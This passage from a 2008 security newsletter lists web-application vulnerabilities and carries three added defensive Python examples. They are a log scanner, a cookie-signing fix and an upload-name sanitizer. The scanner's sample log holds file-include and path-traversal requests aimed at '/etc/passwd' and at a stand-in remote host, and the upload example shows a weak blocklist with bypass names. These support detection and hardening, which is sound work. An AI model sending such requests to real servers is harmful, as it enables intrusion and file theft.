sanitize user-supplied input. Exero CMS versions 1.0.0 and 1.0.1 are
affected.
Ref: http://sourceforge.net/project/shownotes.php?release_id=607502
______________________________________________________________________

08.26.93 CVE: Not Available
Platform: Web Application
Title: doITlive CMS Multiple SQL Injection and Cross-Site Scripting
Vulnerabilities
Description: doITlive CMS is a content manager implemented in ASP. The
application is exposed to multiple input validation issues because it
fails to adequately sanitize user-supplied data. doITlive CMS version
2.50 is affected.
Ref: http://www.securityfocus.com/bid/29789
______________________________________________________________________

08.26.94 CVE: Not Available
Platform: Web Application
Title: aspWebCalendar "calendar_admin.asp" Arbitrary File Upload
Description: aspWebCalendar is a web-based scheduling application
implemented in ASP. The application is exposed to an issue that lets
remote attackers upload and execute arbitrary script code on an
affected computer with the privileges of the web server process. The
issue occurs because the software fails to properly sanitize
user-supplied input in the form of file extensions to the
"calendar_admin.asp" script. aspWebCalendar 2008 is affected.
Ref: http://www.securityfocus.com/bid/29795
______________________________________________________________________

08.26.95 CVE: Not Available
Platform: Web Application
Title: TYPO3 nepa-design.de Spam Protection Extension Unspecified
Setting Manipulation
Description: nepa-design.de Spam Protection is an extension for TYPO3
that is designed to mitigate spam email. The extension is exposed to
an issue that results in the manipulation of external settings.
nepa-design.de Spam Protection version 0.1.3 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.96 CVE: Not Available
Platform: Web Application
Title: TYPO3 Frontend Filemanager Extension Unspecified Code Execution
Description: The Frontend Filemanager extension adds file management
capabilities to TYPO3. The application is exposed to an unspecified
code execution issue. Frontend Filemanager versions prior to 0.6.2 are
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.97 CVE: Not Available
Platform: Web Application
Title: Lotus Core CMS "phpbb_root_path" Parameter Multiple Remote File
Include Vulnerabilities
Description: Lotus Core CMS is an application to create web sites. The
application is exposed to multiple remote file include issues because
it fails to sufficiently sanitize user-supplied input to the
"phpbb_root_path" parameter of the "system/plugins/index.php" and
"system/plugins/error/404.php" scripts. Lotus Core CMS version 1.0.1
is affected.
Ref: http://www.securityfocus.com/bid/29838
______________________________________________________________________

08.26.98 CVE: Not Available
Platform: Web Application
Title: EZTechhelp Company EZCMS Multiple Unspecified Vulnerabilities
Description: EZCMS is a PHP-based content manager. The application is
exposed to multiple issues including an SQL injection issue and
unspecified issues affecting the application's "News manager",
"Calendar", and "Contact form manager". EZCMS versions 1.2 and earlier
are affected.
Ref: http://ezcms.eztechhelp.com/index.php?page=3&nid=27
______________________________________________________________________

08.26.99 CVE: Not Available
Platform: Web Application
Title: Virtual Support Office-XP Multiple Remote Vulnerabilities
Description: Virtual Support Office-XP is a web-based help desk
application implemented in ASP. The application is exposed to
multiple remote issues. Virtual Support Office-XP versions 3.0.29 and
3.0.27 are affected.
Ref: http://www.securityfocus.com/bid/29841
______________________________________________________________________

08.26.100 CVE: Not Available
Platform: Web Application
Title: FireAnt "index.php" Local File Include
Description: FireAnt is a PHP-based media player designed for internet
TV. The application is exposed to a local file include issue because
it fails to properly sanitize user-supplied input to the "page"
parameter of the "index.php" script. FireAnt version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/29843
______________________________________________________________________

08.26.101 CVE: Not Available
Platform: Web Application
Title: IPTBB "act" Parameter Local File Include
Description: IPTBB is a web-based bulletin board application. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "act" parameter of the
"index.php" script. IPTBB version 0.5.6 is affected.
Ref: http://www.securityfocus.com/bid/29845
______________________________________________________________________

08.26.102 CVE: Not Available
Platform: Web Application
Title: FubarForum "index.php" Local File Include
Description: FubarForum is a PHP-based web forum application. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "page" parameter of
the "index.php" script. FubarForum version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/29847
______________________________________________________________________

08.26.103 CVE: Not Available
Platform: Web Application
Title: Lightweight News Portal Multiple Input Validation and
Authentication Bypass Vulnerabilities
Description: Lightweight News Portal is a PHP-based content manager.
The application is exposed to multiple issues. Attackers can leverage
these issues to have arbitrary HTML or script code execute in the
context of the affected site, or to access certain administrative
functions. Lightweight News Portal version 1.0b is affected.
Ref: http://www.securityfocus.com/bid/29848
______________________________________________________________________

08.26.104 CVE: Not Available
Platform: Web Application
Title: Diigo Toolbar and Diigolet Comment Feature HTML Injection and
Information Disclosure Vulnerabilities
Description: Diigo Toolbar and Diigolet are browser plugins for
Firefox and Internet Explorer that interface with the Diigo social
networking service. The plugins are exposed to an HTML injection
(cross-site scripting) issue and an information disclosure issue. The
HTML injection issue occurs because Diigo Toolbar fails to adequately
sanitize user-supplied input to the shared comment feature.
Ref: http://www.securityfocus.com/archive/1/493531
______________________________________________________________________

08.26.105 CVE: Not Available
Platform: Web Application
Title: Jamroom "purchase.php" Remote File Include
Description: Jamroom is a web-based content management system for
artists. The application is exposed to a remote file include issue
because it fails to sufficiently sanitize user-supplied input to the
"jamroom[jm_dir]" parameter of the
"include/plugins/jrBrowser/purchase.php" script. Jamroom version 3.3.5
is affected.
Ref: http://www.securityfocus.com/bid/29854
______________________________________________________________________

08.26.106 CVE: Not Available
Platform: Web Application
Title: Aprox CMS Engine "index.php" Local File Include
Description: Aprox CMS Engine is a content management system. The
application is exposed to a local file include issue because it fails
to properly sanitize user-supplied input to the "page" parameter of
the "index.php" script. Aprox CMS Engine version 5.1.0.4 is affected.
Ref: http://www.securityfocus.com/bid/29860
______________________________________________________________________
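The remote and local file include entries in this issue (Orlando CMS, WebCalendar, Lotus Core CMS, FireAnt, IPTBB, FubarForum, Jamroom, Aprox CMS Engine) share one attack shape: a path or URL arrives in a request parameter and ends up in an include() call. The following Python script is an added example, not part of this bulletin or of any of the listed products. It scans Apache-style access-log lines for the indicators a responder would look for: a remote URL or PHP stream wrapper in a parameter value, "../" traversal, well-known sensitive files, null bytes, and double percent-encoding. The log lines, hosts and script paths in it are constructed for the demo; the "page", "includedir" and "GLOBALS[preloc]" parameter names are borrowed from the entries only as illustrations.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format access-log lines for the demo. Hosts,
# scripts and parameter values are made up to mirror the bulletin's RFI/LFI
# entries; they are not taken from any real server or incident.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jun/2008:10:01:02 -0500] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jun/2008:10:01:05 -0500] "GET /tools/send_reminders.php?includedir=http://203.0.113.9/x.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Jun/2008:10:02:10 -0500] "GET /modules/core/logger/init.php?GLOBALS[preloc]=ftp://203.0.113.9/s.txt HTTP/1.1" 200 88 "-" "curl/7.18.2"
198.51.100.4 - - [26/Jun/2008:10:02:11 -0500] "GET /view/index.php?path=%252e%252e%252f%252e%252e%252fetc%252fpasswd&p=home HTTP/1.1" 200 120 "-" "curl/7.18.2"
192.0.2.20 - - [26/Jun/2008:10:03:00 -0500] "GET /index.php?page=news HTTP/1.1" 200 4020 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# Schemes and stream wrappers that PHP's include() will open when
# allow_url_include / allow_url_fopen permit it. php:// wrappers are grouped
# under "rfi" here because they travel the same code path.
REMOTE_SCHEME = re.compile(r'^\s*(?:https?|ftps?|php|data|expect|file|phar|glob):', re.I)
TRAVERSAL = re.compile(r'\.\.[/\\]')
SENSITIVE = re.compile(r'(?:^|/)(?:etc/passwd|proc/self/environ|boot\.ini|win\.ini)\b', re.I)


def classify_value(value):
    """Return the set of indicator classes ('rfi', 'lfi') present in one
    parameter value. The value is examined as decoded by the log parser and
    once more after a second percent-decode, which catches %252e%252e%252f
    style double encoding that a single decode leaves as %2e%2e%2f."""
    kinds = set()
    for candidate in (value, unquote(value)):
        if REMOTE_SCHEME.match(candidate):
            kinds.add("rfi")
        if TRAVERSAL.search(candidate) or SENSITIVE.search(candidate) or "\x00" in candidate:
            kinds.add("lfi")
    return kinds


def scan_log(text):
    """Parse access-log lines and return one finding per suspicious query
    parameter, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kinds = classify_value(value)
            if kinds:
                findings.append({
                    "ip": m.group("ip"),
                    "script": parts.path,
                    "param": name,
                    "kinds": sorted(kinds),
                    # register_globals-era array parameters such as GLOBALS[preloc]
                    # overwrite configuration variables inside the application
                    "overrides_global": name.startswith("GLOBALS["),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<14} {f['script']:<32} {f['param']:<18} {'+'.join(f['kinds'])}")
```

Run it against a real log with scan_log(open(path).read()). It only inspects the query string; POST bodies and cookies are not in the access log, so a clean result is not proof of absence, and a GLOBALS[...] parameter flagged by "overrides_global" is worth alerting on even when its value looks benign, because a request should never be able to set it at all.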

08.26.107 CVE: Not Available
Platform: Web Application
Title: IDMOS "site_absolute_path" Parameter Multiple Remote File
Include Vulnerabilities
Description: IDMOS is a PHP-based content manager. The application is
exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input to the "site_absolute_path"
parameter. IDMOS version 1.0 is affected.
Ref: http://www.securityfocus.com/bid/29868
______________________________________________________________________

08.26.108 CVE: Not Available
Platform: Web Application
Title: le.cms "admin/upload.php" Arbitrary File Upload
Description: le.cms is a PHP-based content manager. The application is
exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input containing file extensions to
the "admin/upload.php" script. le.cms versions 1.4 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/29867
______________________________________________________________________

08.26.109 CVE: Not Available
Platform: Web Application
Title: CCleague Pro "type" Cookie Parameter Authentication Bypass
Description: CCleague Pro is a web-based application for managing
sports teams. The application is exposed to an authentication bypass
issue because it fails to adequately verify user-supplied input used
for cookie-based authentication. CCleague Pro versions 1.2 and earlier
are affected.
Ref: http://www.securityfocus.com/bid/29871
______________________________________________________________________

08.26.110 CVE: Not Available
Platform: Web Application
Title: le.cms "submit0" Parameter Authentication Bypass
Description: le.cms is a PHP-based content manager. The application is
exposed to an authentication bypass issue because it fails to
adequately verify user-supplied input. le.cms versions 1.4 and earlier
are affected.
Ref: http://www.securityfocus.com/bid/29872
______________________________________________________________________
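The CCleague Pro entry above describes the pattern behind most cookie-based authentication bypasses: a role or user-type value is stored in a client cookie and believed as-is on later requests, so the client can simply rewrite it. The Python code below is an added example, not code from CCleague Pro, le.cms or this bulletin; the cookie name "type", the role values and the secret key are assumptions for the demo. It places the trusting check beside a variant in which the server binds the role to an HMAC that only it can compute, and shows that a forged or rewritten cookie then fails.

```python
import hashlib
import hmac
from http.cookies import SimpleCookie

# Assumed server-side secret for the demo. In deployment it is generated per
# site, loaded from configuration and never committed to source.
SECRET = b"constructed-demo-secret-do-not-reuse"
COOKIE_NAME = "type"   # assumed cookie name, borrowed from the CCleague Pro entry


def _cookie_value(cookie_header):
    jar = SimpleCookie()
    jar.load(cookie_header)
    return jar[COOKIE_NAME].value if COOKIE_NAME in jar else None


def is_admin_vulnerable(cookie_header):
    """The bypass pattern: the role comes straight from the client's cookie
    and is believed without any server-side verification."""
    return _cookie_value(cookie_header) == "admin"


def _mac(role):
    return hmac.new(SECRET, role.encode("utf-8"), hashlib.sha256).hexdigest()


def issue_cookie(role):
    """What the server sets after a successful login: the role plus an HMAC
    over it under the server secret."""
    return f"{COOKIE_NAME}={role}.{_mac(role)}"


def is_admin_hardened(cookie_header):
    """Accept the role only if its MAC was produced with the server secret.
    compare_digest keeps the comparison constant-time."""
    value = _cookie_value(cookie_header)
    if value is None:
        return False
    role, _, mac = value.rpartition(".")
    if not role or not hmac.compare_digest(mac, _mac(role)):
        return False
    return role == "admin"


if __name__ == "__main__":
    forged = f"{COOKIE_NAME}=admin"                       # client just writes the value
    tampered = issue_cookie("user").replace("user", "admin", 1)  # rewrites a real cookie
    print("trusting check, forged cookie:", is_admin_vulnerable(forged))
    print("hmac check, forged cookie:    ", is_admin_hardened(forged))
    print("hmac check, tampered cookie:  ", is_admin_hardened(tampered))
    print("hmac check, issued admin:     ", is_admin_hardened(issue_cookie("admin")))
```

An HMAC-bound cookie is the minimum fix. A server-side session table keyed by a random identifier is usually better, since it also gives revocation and expiry, neither of which the MAC alone provides; whichever is used, the secret must be generated per deployment rather than shipped with the application.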

08.26.111 CVE: Not Available
Platform: Web Application
Title: RSS-aggregator "display.php" Remote File Include
Description: RSS-aggregator is a web-based application that is used to
display several different RSS feeds on a Web page. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the "path" parameter of
the "display.php" script.
Ref: http://www.securityfocus.com/bid/29873
______________________________________________________________________

08.26.112 CVE: Not Available
Platform: Web Application
Title: MiGCMS Multiple Remote File Include Vulnerabilities
Description: MiGCMS is a PHP-based content manager. The application is
exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input to the
"GLOBALS[application][app_root]" parameter of the following scripts:
"collection.class.php" and "content_image.class.php". MiGCMS version
2.0.5 is affected.
Ref: http://www.securityfocus.com/bid/29874
______________________________________________________________________

08.26.113 CVE: Not Available
Platform: Web Application
Title: HoMaP "plugin_admin.php" Remote File Include
Description: HoMaP is a web-based content management system. The
application is exposed to a remote file include issue because it fails
to sufficiently sanitize user-supplied input to the
"_settings[pluginpath]" parameter of the "plugin_admin.php" script.
HoMaP version 0.1 is affected.
Ref: http://www.securityfocus.com/bid/29877
______________________________________________________________________

08.26.114 CVE: Not Available
Platform: Web Application
Title: phpDMCA Multiple Remote File Include Vulnerabilities
Description: phpDMCA is a PHP-based content manager. The application
is exposed to multiple remote file include issues because it fails to
sufficiently sanitize user-supplied input to the "ourlinux_root_path"
parameter of the following scripts: "adodb-errorpear.inc.php" and
"adodb-pear.inc.php". phpDMCA version 1.0.0 is affected.
Ref: http://www.securityfocus.com/bid/29880
______________________________________________________________________

08.26.115 CVE: Not Available
Platform: Web Application
Title: Open Digital Assets Repository System Remote File Include
Description: Open Digital Assets Repository System (ODARS) is a
web-based content and asset management system. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the "CLASSES_ROOT"
parameter of the "resource_categories_view.php" script. ODARS version
1.0.2 is affected.
Ref: http://www.securityfocus.com/bid/29881
______________________________________________________________________

08.26.116 CVE: Not Available
Platform: Web Application
Title: benja CMS Multiple Input Validation and Unauthorized Access
Vulnerabilities
Description: benja CMS is a PHP-based content manager. The application
is exposed to multiple input validation issues. Exploiting these
issues could allow an attacker to steal cookie-based authentication
credentials, have arbitrary script code execute in the context of the
application, or to access administrative scripts. benja CMS version
0.1 is affected.
Ref: http://www.securityfocus.com/archive/1/493568
______________________________________________________________________

08.26.117 CVE: Not Available
Platform: Web Application
Title: J00lean-CMS "includes/classes/page.php" Unspecified Remote
Vulnerability
Description: J00lean-CMS is a PHP-based content manager. The
application is exposed to an unspecified issue that occurs in the
"includes/classes/page.php" script. J00lean-CMS version 1.03 is
affected.
Ref: http://sourceforge.net/project/shownotes.php?release_id=608171
______________________________________________________________________

08.26.118 CVE: Not Available
Platform: Web Application
Title: CMS Mini "view/index.php" Multiple Local File Include
Vulnerabilities
Description: CMS Mini is a PHP-based content manager. The application
is exposed to multiple local file include issues because it fails to
properly sanitize user-supplied input to the "path" and "p" parameters
of the "view/index.php" script. CMS Mini version 0.2.2 is affected.
Ref: http://www.securityfocus.com/bid/29890
______________________________________________________________________

08.26.119 CVE: Not Available
Platform: Web Application
Title: CMReams Cross-Site Scripting and Local File Include
Vulnerabilities
Description: CMReams is a content management application. The
application is exposed to multiple input validation issues. CMReams
version 1.3.1.1beta 2 is affected.
Ref: http://www.securityfocus.com/bid/29891
______________________________________________________________________

08.26.120 CVE: Not Available
Platform: Web Application
Title: emuCMS "upload.php" Arbitrary File Upload
Description: emuCMS is a PHP-based content manager. The application is
exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input to the "NewFile" parameter of
the "/admin/FCKeditor/editor/filemanager/upload/php/upload.php"
script. emuCMS version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29892
______________________________________________________________________

08.26.121 CVE: Not Available
Platform: Web Application
Title: BlogPHP "email" Parameter Privilege Escalation
Description: BlogPHP is a PHP-based blogging application. The
application is exposed to a privilege escalation issue because it
fails to adequately sanitize user-supplied input to the "email"
parameter during user registration. BlogPHP version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/29898
______________________________________________________________________

08.26.122 CVE: Not Available
Platform: Web Application
Title: MyBlog Cross-Site Scripting and SQL Injection Vulnerabilities
Description: MyBlog is a PHP-based Blog/CMS application. Since it
fails to sufficiently sanitize user-supplied data, the application is
exposed to multiple input validation issues.
Ref: http://www.securityfocus.com/bid/29900
______________________________________________________________________

08.26.123 CVE: CVE-2008-2827
Platform: Web Application
Title: Joomla! and Mambo FacileForms Component "ff_compath" Parameter
Remote File Include
Description: FacileForms is a PHP-based form creation component for
the Mambo and Joomla! content managers. The application is exposed to
a remote file include issue because it fails to sufficiently sanitize
user-supplied input to the "ff_compath" parameter of the
"com_facileforms/facileforms.frame.php" script. FacileForms version
1.4.4 is affected.
Ref: http://www.securityfocus.com/bid/29904
______________________________________________________________________

08.26.124 CVE: Not Available
Platform: Web Application
Title: Dagger "skins/default.php" Remote File Include
Description: Dagger is a content management system. The application is
exposed to a remote file include issue because it fails to
sufficiently sanitize user-supplied input to the "dir_inc" parameter
of the "skins/default.php" script.
Ref: http://www.securityfocus.com/bid/29906
______________________________________________________________________

08.26.125 CVE: Not Available
Platform: Web Application
Title: Ourvideo CMS Multiple Input Validation Vulnerabilities
Description: Ourvideo CMS is a media content manager. The application
is exposed to multiple input validation issues because it fails to
adequately sanitize user-supplied input. Ourvideo CMS version 9.5 is
affected.
Ref: http://www.securityfocus.com/bid/29909
______________________________________________________________________

08.26.126 CVE: Not Available
Platform: Web Application
Title: cmsWorks "lib.module.php" Remote File Include
Description: cmsWorks is a content management solution. The
application is exposed to a remote file include issue because it fails
to properly sanitize user-supplied input to the "mod_root" parameter
of the "admin/include/lib.module.php/lib.module.php" script. cmsWorks
version 2.2 RC4 is affected.
Ref: http://www.securityfocus.com/bid/29911
______________________________________________________________________

08.26.127 CVE: Not Available
Platform: Web Application
Title: cmsWorks "config.php" Arbitrary File Upload
Description: cmsWorks is a web-based content manager. The application
is exposed to an issue that lets remote attackers upload and execute
arbitrary script code on an affected computer with the privileges of
the web server process. The issue occurs because the software fails to
properly sanitize user-supplied input in the form of file extensions
to the
"path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php"
script. cmsWorks version 2.2 RC4 is affected.
Ref: http://www.securityfocus.com/bid/29914
______________________________________________________________________

08.26.128 CVE: Not Available
Platform: Web Application
Title: A+ PHP Scripts News Management System Multiple Input Validation
Vulnerabilities
Description: A+ PHP Scripts News Management System is a web-based
application. The application is exposed to multiple input validation
issues. News Management System version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29912
______________________________________________________________________

08.26.129 CVE: Not Available
Platform: Web Application
Title: Php F1 Max's Image Uploader "index.php" Arbitrary File Upload
Description: Max's Image Uploader is a PHP-based web application. The
application is exposed to an issue that lets remote attackers upload
and execute arbitrary code because it fails to properly sanitize
user-supplied files uploaded via the "index.php" script.
Ref: Not Available
______________________________________________________________________
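Five entries in this issue (aspWebCalendar, le.cms, emuCMS, cmsWorks, Max's Image Uploader) are arbitrary file uploads that come down to a file-extension check an attacker can talk around. The Python functions below are an added example, not code from those products or from this bulletin; the allowed and blocked extension sets and the file names are assumptions chosen for the demo. The first function is a deliberately weak blocklist check, kept to show which names it lets through; the second is the allowlisting replacement.

```python
import os
import re

# Assumed policy for an image upload endpoint (demo values, not any product's config).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# The kind of blocklist such upload handlers typically shipped with.
BLOCKED_EXTENSIONS = {"php", "asp", "aspx", "jsp"}


def upload_allowed_vulnerable(filename):
    """Weak check, kept to show what it misses: compares only the last
    extension, case-sensitively, against a blocklist. 'shell.PHP',
    'shell.phtml', 'shell.php.jpg' and '.htaccess' all pass."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS


def sanitize_upload(filename):
    """Allowlisting replacement. Returns the name to store, or None to reject.
    - strips directory components so '../../x.jpg' cannot leave the upload dir
    - rejects null bytes (the 'shell.php%00.jpg' trick against C-level
      filesystem calls, which stop reading at the null)
    - folds case and requires the single extension to be on the allowlist
    - rejects dots in the stem, so 'shell.php.jpg' is refused even though its
      last extension is acceptable (Apache mod_mime can still hand such a
      file to PHP)
    - rejects an empty stem, which covers '.htaccess' and other dotfiles"""
    name = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in name:
        return None
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem:
        return None
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    return f"{stem}.{ext}"


if __name__ == "__main__":
    for candidate in ("photo.jpg", "shell.php", "shell.PHP", "shell.phtml",
                      "shell.php.jpg", ".htaccess", "shell.php\x00.jpg",
                      "../../photo.JPG"):
        print(f"{candidate!r:24} blocklist={upload_allowed_vulnerable(candidate)!s:5} "
              f"allowlist={sanitize_upload(candidate)!r}")
```

The name check is necessary but not sufficient: store uploads outside the document root or in a directory where the web server will not execute scripts, check the content as well as the name, and consider replacing the user-supplied stem with a random name so that the stored path is never attacker-chosen.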

(c) 2008. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a
party other than Qualys (as indicated herein) and permission to use
such material must be requested from the copyright owner.

Subscriptions: RISK is distributed free of charge by the SANS Institute
to people responsible for managing and securing information systems and
networks. You may forward this newsletter to others with such
responsibility inside or outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkhkPBwACgkQ+LUG5KFpTkaWRACfULIyr8pDEFLPKMtrILn9AXyK
3IUAoJD+LAr5fImmbpmGlHpakMGjFdpm
=0x0/
-----END PGP SIGNATURE-----